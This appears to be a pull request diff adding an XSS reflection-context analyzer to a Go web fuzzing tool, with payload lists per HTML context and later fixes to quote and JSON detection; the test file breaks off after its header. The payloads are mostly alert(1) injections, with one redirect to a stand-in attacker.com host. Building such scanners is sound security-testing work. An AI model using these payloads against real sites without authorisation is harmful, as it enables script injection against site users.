### PR TITLE
feat(fuzz): add XSS reflection context analyzer

### DIFF
--- a/pkg/fuzz/analyzers/xss/analyzer.go
+++ b/pkg/fuzz/analyzers/xss/analyzer.go
@@ -346,16 +346,29 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 		case html.TextToken:
 			tok := tokenizer.Token()
 			data := tok.Data
-			if containsMarkerStr(data, markerLower) {
+			dataLower := strings.ToLower(data)
+			// Iterate every occurrence of the marker in this text token so that
+			// multiple reflections inside a single token are all captured.
+			// e.g. `var a="FUZZ"; var b=\`FUZZ\`` contains two distinct contexts.
+			searchOffset := 0
+			for {
+				idx := strings.Index(dataLower[searchOffset:], markerLower)
+				if idx < 0 {
+					break
+				}
+				absIdx := searchOffset + idx
+				// Extract the segment up to (and including) this occurrence for
+				// per-reflection helpers that inspect "what comes before the marker".
+				segment := data[:absIdx+len(markerLower)]
 				_ = currentTag
 				if inScript {
 					ctx := ContextScriptData
 					if scriptIsExec {
 						ctx = ContextScript
 						// Refine: is it inside a template literal?
-						if isInTemplateLiteral(data, markerLower) {
+						if isInTemplateLiteral(segment, markerLower) {
 							ctx = ContextTemplate
-						} else if isJSONContext(data, markerLower) {
+						} else if isJSONContext(segment, markerLower) {
 							ctx = ContextJSON
 						}
 					}
@@ -368,6 +381,7 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 				} else {
 					findings = append(findings, reflectionFinding{ctx: ContextHTMLBody})
 				}
+				searchOffset = absIdx + len(markerLower)
 			}
 
 		case html.DoctypeToken:
@@ -674,12 +688,25 @@ func buildResult(f reflectionFinding) XSSResult {
 
 	case ContextAttributeURL:
 		r.Confidence = 0.85
-		r.Payloads = []string{
-			`javascript:alert(1)`,
-			`javascript:alert(document.domain)`,
-			`javascript:void(0);alert(1)`,
-			// If not directly executable, offer relative-path payloads
-			`//attacker.com/evil.js`,
+		// Only advertise javascript: URI payloads for tag+attr combos that are
+		// known executable sinks (e.g. a[href], area[href], form[action]).
+		// Inert URL sinks like img[src] and script[src] do not execute javascript:
+		// URIs in modern browsers; surfacing those payloads is misleading.
+		if f.isExecutable {
+			r.IsExecutableSink = true
+			r.Payloads = []string{
+				`javascript:alert(1)`,
+				`javascript:alert(document.domain)`,
+				`javascript:void(0);alert(1)`,
+			}
+			r.Explanation = "Marker is in an executable URL attribute (e.g. a[href]). Try javascript: scheme."
+		} else {
+			// Non-executable URL sink: offer attribute break-out and open-redirect payloads.
+			r.Payloads = []string{
+				`//attacker.com/`,
+				`https://attacker.com/`,
+			}
+			r.Explanation = "Marker is in a URL attribute (non-executable sink). Try open-redirect or attribute break-out."
 		}
 		if f.quoteChar == '"' {
 			r.BreakoutSeq = `"`
@@ -693,7 +720,6 @@ func buildResult(f reflectionFinding) XSSResult {
 				`' onmouseover='alert(1)`,
 			)
 		}
-		r.Explanation = "Marker is in a URL attribute. Try javascript: scheme or break out of the attribute."
 
 	case ContextAttributeStyle:
 		r.Confidence = 0.82

--- a/pkg/fuzz/analyzers/xss/analyzer.go
+++ b/pkg/fuzz/analyzers/xss/analyzer.go
@@ -479,11 +479,24 @@ func classifyAttrValueContext(attrName, attrValue, tagName string) (XSSContext, 
 // detectAttrQuoteChar probes the raw HTML source around the marker to determine
 // which quote character wraps the attribute value. Returns '"', '\'' or 0 (unquoted).
 //
-// This is a heuristic — it searches for attrName= before the first occurrence
-// of the marker in the raw body and reads the delimiter byte.
+// It searches backward from the reflection position (first occurrence of markerOriginal)
+// to find the nearest preceding attrName= and reads its delimiter byte.
+// This avoids false positives from other occurrences of the same attribute elsewhere
+// in the document.
 func detectAttrQuoteChar(rawBody, markerOriginal, attrName string) byte {
 	search := attrName + "="
-	idx := strings.Index(strings.ToLower(rawBody), search)
+	searchLower := strings.ToLower(search)
+	rawLower := strings.ToLower(rawBody)
+
+	// Find the position of the marker in the raw body first.
+	markerIdx := strings.Index(rawLower, strings.ToLower(markerOriginal))
+	if markerIdx < 0 {
+		return '"' // default assumption
+	}
+
+	// Search backward: find the last occurrence of attrName= before the marker.
+	segment := rawLower[:markerIdx]
+	idx := strings.LastIndex(segment, searchLower)
 	if idx < 0 {
 		return '"' // default assumption
 	}
@@ -541,6 +554,11 @@ func isJSONContext(text, markerLower string) bool {
 	// Pattern: `": "` or `': '` or `["`
 	last := trimmed[len(trimmed)-1]
 	if last != '"' && last != '\'' && last != '[' {
+		return false
+	}
+	// JSON only uses double quotes. If the value is wrapped in single quotes,
+	// this is a JavaScript string or similar context — not valid JSON.
+	if last == '\'' {
 		return false
 	}
 	// Additional check: must see a colon (JSON key separator) in the context

--- a/pkg/fuzz/analyzers/xss/analyzer.go
+++ b/pkg/fuzz/analyzers/xss/analyzer.go
@@ -1,0 +1,783 @@
+package xss
+
+import (
+	"io"
+	"strings"
+
+	"golang.org/x/net/html"
+)
+
+// urlAttrs lists attributes whose values may contain navigable URIs.
+// Includes all attrs from the WHATWG Living Standard fetch/navigation specs.
+var urlAttrs = map[string]struct{}{
+	"href":        {},
+	"src":         {},
+	"action":      {},
+	"formaction":  {},
+	"data":        {},
+	"poster":      {},
+	"codebase":    {},
+	"cite":        {},
+	"background":  {},
+	"manifest":    {},
+	"icon":        {},
+	"ping":        {},
+	"longdesc":    {},
+	"usemap":      {},
+	"profile":     {},
+	"archive":     {},
+	"classid":     {},
+	"content":     {}, // <meta http-equiv="refresh" content="0; url=MARKER">
+	"xmlns":       {},
+	"xlink:href":  {},
+	"xml:base":    {},
+}
+
+// eventHandlers lists attributes that execute JavaScript when triggered.
+// Generated from the WHATWG HTML Living Standard § 8.1.8.1 event handlers.
+var eventHandlers = map[string]struct{}{
+	"onabort":                  {},
+	"onafterprint":             {},
+	"onauxclick":               {},
+	"onbeforeinput":            {},
+	"onbeforeprint":            {},
+	"onbeforeunload":           {},
+	"onblur":                   {},
+	"oncancel":                 {},
+	"oncanplay":                {},
+	"oncanplaythrough":         {},
+	"onchange":                 {},
+	"onclick":                  {},
+	"onclose":                  {},
+	"oncontextmenu":            {},
+	"oncopy":                   {},
+	"oncuechange":              {},
+	"oncut":                    {},
+	"ondblclick":               {},
+	"ondrag":                   {},
+	"ondragend":                {},
+	"ondragenter":              {},
+	"ondragleave":              {},
+	"ondragover":               {},
+	"ondragstart":              {},
+	"ondrop":                   {},
+	"ondurationchange":         {},
+	"onemptied":                {},
+	"onended":                  {},
+	"onerror":                  {},
+	"onfocus":                  {},
+	"onfocusin":                {},
+	"onfocusout":               {},
+	"onformdata":               {},
+	"ongotpointercapture":      {},
+	"onhashchange":             {},
+	"oninput":                  {},
+	"oninvalid":                {},
+	"onkeydown":                {},
+	"onkeypress":               {},
+	"onkeyup":                  {},
+	"onload":                   {},
+	"onloadeddata":             {},
+	"onloadedmetadata":         {},
+	"onloadstart":              {},
+	"onlostpointercapture":     {},
+	"onmessage":                {},
+	"onmousedown":              {},
+	"onmouseenter":             {},
+	"onmouseleave":             {},
+	"onmousemove":              {},
+	"onmouseout":               {},
+	"onmouseover":              {},
+	"onmouseup":                {},
+	"onoffline":                {},
+	"ononline":                 {},
+	"onpagehide":               {},
+	"onpageshow":               {},
+	"onpaste":                  {},
+	"onpause":                  {},
+	"onplay":                   {},
+	"onplaying":                {},
+	"onpointercancel":          {},
+	"onpointerdown":            {},
+	"onpointerenter":           {},
+	"onpointerleave":           {},
+	"onpointermove":            {},
+	"onpointerout":             {},
+	"onpointerover":            {},
+	"onpointerup":              {},
+	"onpopstate":               {},
+	"onprogress":               {},
+	"onratechange":             {},
+	"onreset":                  {},
+	"onresize":                 {},
+	"onscroll":                 {},
+	"onsearch":                 {},
+	"onsecuritypolicyviolation": {},
+	"onseeked":                 {},
+	"onseeking":                {},
+	"onselect":                 {},
+	"onslotchange":             {},
+	"onstalled":                {},
+	"onstorage":                {},
+	"onsubmit":                 {},
+	"onsuspend":                {},
+	"ontimeupdate":             {},
+	"ontoggle":                 {},
+	"ontouchcancel":            {},
+	"ontouchend":               {},
+	"ontouchmove":              {},
+	"ontouchstart":             {},
+	"ontransitionend":          {},
+	"onunload":                 {},
+	"onvolumechange":           {},
+	"onwaiting":                {},
+	"onwheel":                  {},
+	"onanimationend":           {},
+	"onanimationiteration":     {},
+	"onanimationstart":         {},
+}
+
+// executableScriptTypes lists MIME types that browsers will actually execute.
+// An empty string means no type attribute was set, which is executable by default.
+var executableScriptTypes = map[string]struct{}{
+	"":                          {},
+	"text/javascript":           {},
+	"application/javascript":    {},
+	"text/ecmascript":           {},
+	"application/ecmascript":    {},
+	"module":                    {},
+	"text/jscript":              {},
+	"text/livescript":           {},
+	"text/x-ecmascript":         {},
+	"text/x-javascript":         {},
+	"application/x-javascript":  {},
+	"application/x-ecmascript":  {},
+}
+
+// executableURLSinks maps URL attribute → set of tags where dangerous URIs
+// (javascript:, vbscript:, data:text/html, etc.) actually execute.
+// Other tag+attr combos are classified as ContextAttributeURL only — e.g.
+// <img src="javascript:alert(1)"> shows as broken image, doesn't execute.
+var executableURLSinks = map[string]map[string]struct{}{
+	"href":       {"a": {}, "area": {}},
+	"src":        {"iframe": {}, "frame": {}, "embed": {}},
+	"action":     {"form": {}},
+	"formaction": {"button": {}, "input": {}},
+	"data":       {"object": {}},
+	"xlink:href": {"a": {}, "use": {}},
+}
+
+// dangerousURIPrefixes are URL schemes / data-URI types that execute JS.
+var dangerousURIPrefixes = []string{
+	"javascript:",
+	"vbscript:",
+	"data:text/html",
+	"data:application/xhtml+xml",
+	"data:image/svg+xml",
+}
+
+// attributeQuoteContext returns the XSSContext that matches the quote character.
+// raw is the raw attribute value as returned by html.Tokenizer (unquoted).
+// We recheck the original HTML source to detect the quote style.
+func attributeQuoteContext(quoteChar byte) XSSContext {
+	switch quoteChar {
+	case '"':
+		return ContextAttributeDouble
+	case '\'':
+		return ContextAttributeSingle
+	default:
+		return ContextAttributeUnquoted
+	}
+}
+
+// reflectionFinding holds intermediate state for a single discovered reflection.
+type reflectionFinding struct {
+	ctx           XSSContext
+	quoteChar     byte
+	attrName      string
+	tagName       string
+	attrValue     string
+	isExecutable  bool
+}
+
+// AnalyzeReflectionContext determines the HTML context where the given marker
+// is reflected in the response body. It returns a detailed XSSResult with
+// payload suggestions.
+//
+// It uses the golang.org/x/net/html tokenizer (already in go.mod) for robust
+// HTML parsing — no regex for structural HTML analysis.
+//
+// If the marker appears multiple times, the first match is returned. Use
+// AnalyzeAllReflections for a full scan.
+func AnalyzeReflectionContext(responseBody, marker string) XSSResult {
+	results := AnalyzeAllReflections(responseBody, marker)
+	if len(results) == 0 {
+		return XSSResult{Context: ContextUnknown, Confidence: 0, Explanation: "marker not found in response"}
+	}
+	// Return the most exploitable finding (lowest context value = highest priority after Unknown)
+	best := results[0]
+	for _, r := range results[1:] {
+		if contextPriority(r.Context) < contextPriority(best.Context) {
+			best = r
+		}
+	}
+	return best
+}
+
+// contextPriority returns an exploitation priority for a context.
+// Lower number = higher priority (more directly exploitable).
+func contextPriority(ctx XSSContext) int {
+	switch ctx {
+	case ContextScript, ContextAttributeEvent:
+		return 1
+	case ContextAttributeURL, ContextSrcDoc:
+		return 2
+	case ContextAttributeUnquoted, ContextAttributeDouble, ContextAttributeSingle:
+		return 3
+	case ContextHTMLBody:
+		return 4
+	case ContextTemplate:
+		return 5
+	case ContextJSON:
+		return 6
+	case ContextStyle, ContextAttributeStyle:
+		return 7
+	case ContextComment, ContextCDATA:
+		return 8
+	case ContextScriptData:
+		return 9
+	default:
+		return 100
+	}
+}
+
+// AnalyzeAllReflections scans the entire response body and returns an XSSResult
+// for every location where the marker is reflected.
+func AnalyzeAllReflections(responseBody, marker string) []XSSResult {
+	if responseBody == "" || marker == "" {
+		return nil
+	}
+
+	markerLower := strings.ToLower(marker)
+	if !strings.Contains(strings.ToLower(responseBody), markerLower) {
+		return nil
+	}
+
+	findings := scanHTML(responseBody, markerLower, marker)
+	if len(findings) == 0 {
+		return nil
+	}
+
+	results := make([]XSSResult, 0, len(findings))
+	for _, f := range findings {
+		results = append(results, buildResult(f))
+	}
+	return results
+}
+
+// scanHTML tokenizes the HTML and collects all reflections.
+func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
+	var findings []reflectionFinding
+
+	tokenizer := html.NewTokenizer(strings.NewReader(body))
+
+	var (
+		inScript     bool
+		inStyle      bool
+		scriptIsExec bool
+		currentTag   string
+	)
+
+	for {
+		tt := tokenizer.Next()
+		switch tt {
+		case html.ErrorToken:
+			if err := tokenizer.Err(); err != nil && err != io.EOF {
+				// parse error — return what we have
+			}
+			return findings
+
+		case html.CommentToken:
+			tok := tokenizer.Token()
+			data := tok.Data
+			if containsMarkerStr(data, markerLower) {
+				findings = append(findings, reflectionFinding{
+					ctx: ContextComment,
+				})
+			}
+
+		case html.StartTagToken, html.SelfClosingTagToken:
+			tn, hasAttr := tokenizer.TagName()
+			tagName := strings.ToLower(string(tn))
+			currentTag = tagName
+
+			if hasAttr {
+				tagFindings, scriptType := scanAttributes(tokenizer, markerLower, tagName, body, markerOriginal)
+				findings = append(findings, tagFindings...)
+				if tt == html.StartTagToken && tagName == "script" {
+					inScript = true
+					scriptIsExec = isScriptTypeExecutable(scriptType)
+				}
+			} else if tt == html.StartTagToken {
+				switch tagName {
+				case "script":
+					inScript = true
+					scriptIsExec = true // no type = executable
+				case "style":
+					inStyle = true
+				}
+			}
+
+			if tt == html.StartTagToken && tagName == "style" {
+				inStyle = true
+			}
+
+		case html.EndTagToken:
+			tn, _ := tokenizer.TagName()
+			switch strings.ToLower(string(tn)) {
+			case "script":
+				inScript = false
+				scriptIsExec = false
+			case "style":
+				inStyle = false
+			}
+			currentTag = ""
+
+		case html.TextToken:
+			tok := tokenizer.Token()
+			data := tok.Data
+			if containsMarkerStr(data, markerLower) {
+				_ = currentTag
+				if inScript {
+					ctx := ContextScriptData
+					if scriptIsExec {
+						ctx = ContextScript
+						// Refine: is it inside a template literal?
+						if isInTemplateLiteral(data, markerLower) {
+							ctx = ContextTemplate
+						} else if isJSONContext(data, markerLower) {
+							ctx = ContextJSON
+						}
+					}
+					findings = append(findings, reflectionFinding{
+						ctx:          ctx,
+						isExecutable: scriptIsExec,
+					})
+				} else if inStyle {
+					findings = append(findings, reflectionFinding{ctx: ContextStyle})
+				} else {
+					findings = append(findings, reflectionFinding{ctx: ContextHTMLBody})
+				}
+			}
+
+		case html.DoctypeToken:
+			// ignore
+		}
+	}
+}
+
+// scanAttributes walks all attributes in a single pass (important: html.Tokenizer's
+// TagAttr() is a forward-only, consumable iterator; calling it twice would
+// return no attrs the second time).
+func scanAttributes(tokenizer *html.Tokenizer, markerLower, tagName, rawBody, markerOriginal string) ([]reflectionFinding, string) {
+	var findings []reflectionFinding
+	scriptType := ""
+	foundFirstType := false
+
+	for {
+		key, val, more := tokenizer.TagAttr()
+		attrName := strings.ToLower(string(key))
+		attrValue := string(val)
+
+		// HTML5 spec: first `type` attribute wins when duplicates exist.
+		if attrName == "type" && !foundFirstType {
+			scriptType = strings.ToLower(strings.TrimSpace(attrValue))
+			foundFirstType = true
+		}
+
+		// Check if marker is in the attribute value
+		if containsMarkerStr(attrValue, markerLower) {
+			quoteChar := detectAttrQuoteChar(rawBody, markerOriginal, attrName)
+			ctx, isExec := classifyAttrValueContext(attrName, attrValue, tagName)
+			// Refine generic attribute context to track quote style
+			if ctx == ContextAttributeDouble {
+				switch quoteChar {
+				case '\'':
+					ctx = ContextAttributeSingle
+				case 0:
+					ctx = ContextAttributeUnquoted
+				// else stays ContextAttributeDouble
+				}
+			}
+			findings = append(findings, reflectionFinding{
+				ctx:          ctx,
+				quoteChar:    quoteChar,
+				attrName:     attrName,
+				tagName:      tagName,
+				attrValue:    attrValue,
+				isExecutable: isExec,
+			})
+		}
+
+		// Check if marker is in the attribute name (unusual but possible with broken parsers)
+		if containsMarkerStr(attrName, markerLower) {
+			findings = append(findings, reflectionFinding{
+				ctx:      ContextHTMLBody, // attr name injection, treat conservatively
+				attrName: attrName,
+				tagName:  tagName,
+			})
+		}
+
+		if !more {
+			break
+		}
+	}
+
+	return findings, scriptType
+}
+
+// classifyAttrValueContext determines the XSS context for an attribute value reflection.
+// Returns the context and whether it is a directly executable sink.
+func classifyAttrValueContext(attrName, attrValue, tagName string) (XSSContext, bool) {
+	// Event handler attributes directly execute JS
+	if _, ok := eventHandlers[attrName]; ok {
+		return ContextAttributeEvent, true
+	}
+
+	// Inline style attribute
+	if attrName == "style" {
+		return ContextAttributeStyle, false
+	}
+
+	// srcdoc is a nested HTML document — treat as HTMLBody for payload purposes
+	if attrName == "srcdoc" {
+		return ContextSrcDoc, true
+	}
+
+	// URL attributes
+	if _, ok := urlAttrs[attrName]; ok {
+		trimmed := strings.TrimSpace(strings.ToLower(attrValue))
+		for _, prefix := range dangerousURIPrefixes {
+			if strings.HasPrefix(trimmed, prefix) {
+				// Only executable if this tag+attr combination is a known executable sink
+				if sinkTags, ok := executableURLSinks[attrName]; ok {
+					if _, ok := sinkTags[tagName]; ok {
+						return ContextScript, true
+					}
+				}
+				// Not executable (e.g. <img src="javascript:...">) but still URL context
+				return ContextAttributeURL, false
+			}
+		}
+		return ContextAttributeURL, false
+	}
+
+	// Generic attribute — context will be refined by quote detection in buildResult
+	return ContextAttributeDouble, false
+}
+
+// detectAttrQuoteChar probes the raw HTML source around the marker to determine
+// which quote character wraps the attribute value. Returns '"', '\'' or 0 (unquoted).
+//
+// This is a heuristic — it searches for attrName= before the first occurrence
+// of the marker in the raw body and reads the delimiter byte.
+func detectAttrQuoteChar(rawBody, markerOriginal, attrName string) byte {
+	search := attrName + "="
+	idx := strings.Index(strings.ToLower(rawBody), search)
+	if idx < 0 {
+		return '"' // default assumption
+	}
+	valueStart := idx + len(search)
+	if valueStart >= len(rawBody) {
+		return '"'
+	}
+	ch := rawBody[valueStart]
+	if ch == '"' || ch == '\'' {
+		return ch
+	}
+	return 0 // unquoted
+}
+
+// isScriptTypeExecutable returns true if the given type is one browsers execute.
+// Strips MIME parameters first (e.g. "text/javascript; charset=utf-8").
+func isScriptTypeExecutable(scriptType string) bool {
+	if i := strings.IndexByte(scriptType, ';'); i != -1 {
+		scriptType = strings.TrimSpace(scriptType[:i])
+	}
+	_, isExec := executableScriptTypes[scriptType]
+	return isExec
+}
+
+// isInTemplateLiteral returns true when the marker appears to be inside a
+// JS template literal (backtick string). This is a best-effort heuristic.
+func isInTemplateLiteral(text, markerLower string) bool {
+	lower := strings.ToLower(text)
+	idx := strings.Index(lower, markerLower)
+	if idx < 0 {
+		return false
+	}
+	before := text[:idx]
+	backticks := strings.Count(before, "`")
+	return backticks%2 == 1
+}
+
+// isJSONContext returns true when the marker appears to be inside a JSON structure.
+// This is a conservative heuristic: we look for the pattern `: "MARKER"` or `["MARKER"]`
+// (colon then quote or open-bracket then quote) in the text around the marker.
+// We require both the key-colon pattern AND valid JSON surrounding characters to
+// avoid false-positives from JS variable assignments like `var x = "MARKER"`.
+func isJSONContext(text, markerLower string) bool {
+	lower := strings.ToLower(text)
+	idx := strings.Index(lower, markerLower)
+	if idx < 0 {
+		return false
+	}
+	before := text[:idx]
+	trimmed := strings.TrimSpace(before)
+	if len(trimmed) == 0 {
+		return false
+	}
+	// Must see: colon preceded by closing quote (JSON key-value) or array start
+	// Pattern: `": "` or `': '` or `["`
+	last := trimmed[len(trimmed)-1]
+	if last != '"' && last != '\'' && last != '[' {
+		return false
+	}
+	// Additional check: must see a colon (JSON key separator) in the context
+	// Avoids matching JS: var x = "MARKER"
+	if last == '"' || last == '\'' {
+		// Look for a colon before the quote that opened the value
+		// We search backwards for the opening quote and check there's a : before it
+		// Simplified: check for `: "` or `: '` pattern
+		if !strings.Contains(trimmed, ": \"") && !strings.Contains(trimmed, ": '") &&
+			!strings.Contains(trimmed, ":{\"") && !strings.Contains(trimmed, ":\"") {
+			return false
+		}
+	}
+	return true
+}
+
+// containsMarkerStr does a case-insensitive substring check.
+// markerLower must already be lowercased by the caller.
+func containsMarkerStr(text, markerLower string) bool {
+	return strings.Contains(strings.ToLower(text), markerLower)
+}
+
+// buildResult converts a reflectionFinding into a full XSSResult with payloads
+// and explanation.
+func buildResult(f reflectionFinding) XSSResult {
+	r := XSSResult{
+		Context:       f.ctx,
+		AttributeName: f.attrName,
+		TagName:       f.tagName,
+		IsExecutableSink: f.isExecutable,
+	}
+
+	if f.quoteChar != 0 {
+		r.QuoteChar = string([]byte{f.quoteChar})
+	}
+
+	switch f.ctx {
+	case ContextHTMLBody:
+		r.Confidence = 0.95
+		r.BreakoutSeq = "<"
+		r.Payloads = []string{
+			`<script>alert(1)</script>`,
+			`<img src=x onerror=alert(1)>`,
+			`<svg onload=alert(1)>`,
+			`<details open ontoggle=alert(1)>`,
+			`<body onload=alert(1)>`,
+			`"><script>alert(1)</script>`,
+		}
+		r.Explanation = "Marker is reflected as raw HTML text. Inject HTML tags directly."
+
+	case ContextComment:
+		r.Confidence = 0.90
+		r.BreakoutSeq = "-->"
+		r.Payloads = []string{
+			`--><script>alert(1)</script>`,
+			`--><img src=x onerror=alert(1)>`,
+			`--><svg onload=alert(1)>`,
+		}
+		r.Explanation = "Marker is inside an HTML comment. Break out with --> then inject."
+
+	case ContextAttributeDouble:
+		r.Confidence = 0.92
+		r.BreakoutSeq = `"`
+		r.QuoteChar = `"`
+		r.Payloads = []string{
+			`" onmouseover="alert(1)`,
+			`"><script>alert(1)</script>`,
+			`"><img src=x onerror=alert(1)>`,
+			`"><svg onload=alert(1)>`,
+			`" autofocus onfocus="alert(1)`,
+		}
+		r.Explanation = "Marker is in a double-quoted attribute. Break out with \" to inject event handlers or new tags."
+
+	case ContextAttributeSingle:
+		r.Confidence = 0.92
+		r.BreakoutSeq = `'`
+		r.QuoteChar = `'`
+		r.Payloads = []string{
+			`' onmouseover='alert(1)`,
+			`'><script>alert(1)</script>`,
+			`'><img src=x onerror=alert(1)>`,
+			`' autofocus onfocus='alert(1)`,
+		}
+		r.Explanation = "Marker is in a single-quoted attribute. Break out with ' to inject event handlers or new tags."
+
+	case ContextAttributeUnquoted:
+		r.Confidence = 0.88
+		r.BreakoutSeq = " "
+		r.Payloads = []string{
+			` onmouseover=alert(1)`,
+			` autofocus onfocus=alert(1)`,
+			`><script>alert(1)</script>`,
+			`><img src=x onerror=alert(1)>`,
+		}
+		r.Explanation = "Marker is in an unquoted attribute. Inject a space to add event handlers or > to break out of tag."
+
+	case ContextAttributeEvent:
+		r.Confidence = 0.98
+		r.IsExecutableSink = true
+		r.Payloads = []string{
+			`alert(1)`,
+			`alert(document.domain)`,
+			`(function(){alert(1)})()`,
+		}
+		if f.quoteChar == '\'' {
+			r.BreakoutSeq = "'"
+			r.Payloads = append([]string{`';alert(1);//`, `'+alert(1)+'`}, r.Payloads...)
+		} else if f.quoteChar == '"' {
+			r.BreakoutSeq = `"`
+			r.Payloads = append([]string{`";alert(1);//`, `"+alert(1)+"`}, r.Payloads...)
+		}
+		r.Explanation = "Marker is in an event handler attribute. This is a direct JavaScript execution sink."
+
+	case ContextAttributeURL:
+		r.Confidence = 0.85
+		r.Payloads = []string{
+			`javascript:alert(1)`,
+			`javascript:alert(document.domain)`,
+			`javascript:void(0);alert(1)`,
+			// If not directly executable, offer relative-path payloads
+			`//attacker.com/evil.js`,
+		}
+		if f.quoteChar == '"' {
+			r.BreakoutSeq = `"`
+			r.Payloads = append(r.Payloads,
+				`" onmouseover="alert(1)`,
+				`"><img src=x onerror=alert(1)>`,
+			)
+		} else if f.quoteChar == '\'' {
+			r.BreakoutSeq = `'`
+			r.Payloads = append(r.Payloads,
+				`' onmouseover='alert(1)`,
+			)
+		}
+		r.Explanation = "Marker is in a URL attribute. Try javascript: scheme or break out of the attribute."
+
+	case ContextAttributeStyle:
+		r.Confidence = 0.82
+		r.Payloads = []string{
+			`}</style><script>alert(1)</script>`,
+			`expression(alert(1))`,   // IE-era but sometimes still tested
+			`;background:url(javascript:alert(1))`,
+			`";}body{background:url("javascript:alert(1)")}`,
+		}
+		if f.quoteChar == '"' {
+			r.BreakoutSeq = `"`
+			r.Payloads = append([]string{`" onmouseover="alert(1)`}, r.Payloads...)
+		}
+		r.Explanation = "Marker is in a style attribute. Try CSS expression() or break out to inject script."
+
+	case ContextScript:
+		r.Confidence = 0.97
+		r.IsExecutableSink = true
+		r.Payloads = []string{
+			`;alert(1);//`,
+			`</script><script>alert(1)</script>`,
+			`\u003cscript\u003ealert(1)\u003c/script\u003e`,
+			`;alert(document.domain);//`,
+			`'-alert(1)-'`,
+			`"-alert(1)-"`,
+		}
+		r.Explanation = "Marker is in an executable script block. Inject JS directly or close the script block."
+
+	case ContextTemplate:
+		r.Confidence = 0.93
+		r.IsExecutableSink = true
+		r.BreakoutSeq = "`"
+		r.Payloads = []string{
+			"${alert(1)}",
+			"`+alert(1)+`",
+			"`;alert(1);//`",
+			"${alert(document.domain)}",
+		}
+		r.Explanation = "Marker is inside a JS template literal. Inject ${alert(1)} or break out of the backtick string."
+
+	case ContextJSON:
+		r.Confidence = 0.80
+		r.Payloads = []string{
+			`</script><script>alert(1)</script>`,
+			`","x":"<img src=x onerror=alert(1)>`,
+			`\u003cscript\u003ealert(1)\u003c/script\u003e`,
+		}
+		r.Explanation = "Marker is inside a JSON value in a script block. Try closing the script or Unicode escapes."
+
+	case ContextScriptData:
+		r.Confidence = 0.65
+		r.Payloads = []string{
+			`</script><script>alert(1)</script>`,
+			`<img src=x onerror=alert(1)>`,
+		}
+		r.Explanation = "Marker is in a non-executable script block. The type attribute prevents execution; try closing the block."
+
+	case ContextStyle:
+		r.Confidence = 0.78
+		r.Payloads = []string{
+			`</style><script>alert(1)</script>`,
+			`</style><img src=x onerror=alert(1)>`,
+			`expression(alert(1))`,
+		}
+		r.Explanation = "Marker is in a CSS <style> block. Close the block to inject HTML."
+
+	case ContextSrcDoc:
+		r.Confidence = 0.90
+		r.IsExecutableSink = true
+		r.Payloads = []string{
+			`<script>alert(1)</script>`,
+			`<img src=x onerror=alert(1)>`,
+			`&lt;script&gt;alert(1)&lt;/script&gt;`, // HTML-entity encoded version
+		}
+		r.Explanation = "Marker is in a srcdoc attribute. This is a nested HTML document — inject tags directly (use HTML entities if needed)."
+
+	case ContextCDATA:
+		r.Confidence = 0.75
+		r.BreakoutSeq = "]]>"
+		r.Payloads = []string{
+			`]]><script>alert(1)</script>`,
+			`]]><img src=x onerror=alert(1)>`,
+		}
+		r.Explanation = "Marker is inside a CDATA section. Close with ]]> then inject HTML."
+
+	default:
+		r.Confidence = 0.5
+		r.Payloads = []string{
+			`<script>alert(1)</script>`,
+			`"><script>alert(1)</script>`,
+			`'><script>alert(1)</script>`,
+			`javascript:alert(1)`,
+		}
+		r.Explanation = "Context could not be precisely determined. Try generic payloads."
+	}
+
+	// Refine quote-specific context after building the base result
+	if f.ctx == ContextAttributeDouble || f.ctx == ContextAttributeSingle || f.ctx == ContextAttributeUnquoted {
+		// already handled above — nothing to do
+	} else if (f.ctx == ContextAttributeURL || f.ctx == ContextAttributeStyle) && f.quoteChar != 0 {
+		// Refine the context name based on quote char (already set QuoteChar above)
+	}
+
+	return r
+}

--- a/pkg/fuzz/analyzers/xss/analyzer.go
+++ b/pkg/fuzz/analyzers/xss/analyzer.go
@@ -285,7 +285,6 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 		inScript     bool
 		inStyle      bool
 		scriptIsExec bool
-		currentTag   string
 	)
 
 	for {
@@ -309,7 +308,6 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 		case html.StartTagToken, html.SelfClosingTagToken:
 			tn, hasAttr := tokenizer.TagName()
 			tagName := strings.ToLower(string(tn))
-			currentTag = tagName
 
 			if hasAttr {
 				tagFindings, scriptType := scanAttributes(tokenizer, markerLower, tagName, body, markerOriginal)
@@ -341,7 +339,6 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 			case "style":
 				inStyle = false
 			}
-			currentTag = ""
 
 		case html.TextToken:
 			tok := tokenizer.Token()
@@ -360,7 +357,6 @@ func scanHTML(body, markerLower, markerOriginal string) []reflectionFinding {
 				// Extract the segment up to (and including) this occurrence for
 				// per-reflection helpers that inspect "what comes before the marker".
 				segment := data[:absIdx+len(markerLower)]
-				_ = currentTag
 				if inScript {
 					ctx := ContextScriptData
 					if scriptIsExec {
@@ -577,11 +573,12 @@ func isJSONContext(text, markerLower string) bool {
 	}
 	// Additional check: must see a colon (JSON key separator) in the context
 	// Avoids matching JS: var x = "MARKER"
-	if last == '"' || last == '\'' {
+	// JSON (RFC 8259) only uses double quotes for strings
+	if last == '"' {
 		// Look for a colon before the quote that opened the value
 		// We search backwards for the opening quote and check there's a : before it
-		// Simplified: check for `: "` or `: '` pattern
-		if !strings.Contains(trimmed, ": \"") && !strings.Contains(trimmed, ": '") &&
+		// Simplified: check for `: "` pattern (JSON only uses double quotes)
+		if !strings.Contains(trimmed, ": \"") &&
 			!strings.Contains(trimmed, ":{\"") && !strings.Contains(trimmed, ":\"") {
 			return false
 		}
@@ -817,11 +814,5 @@ func buildResult(f reflectionFinding) XSSResult {
 	}
 
 	// Refine quote-specific context after building the base result
-	if f.ctx == ContextAttributeDouble || f.ctx == ContextAttributeSingle || f.ctx == ContextAttributeUnquoted {
-		// already handled above — nothing to do
-	} else if (f.ctx == ContextAttributeURL || f.ctx == ContextAttributeStyle) && f.quoteChar != 0 {
-		// Refine the context name based on quote char (already set QuoteChar above)
-	}
-
 	return r
 }

--- a/pkg/fuzz/analyzers/xss/analyzer_test.go
+++ b/pkg/fuzz/analyzers/xss/analyzer_test.go
@@ -1,0 +1,723 @@
+package xss
+
+import (
+	"strings"
+	"testing"
+)
+
+// ---- helpers ----
+
+func assertContext(t *testing.T, name, body, marker string, want XSSContext) {
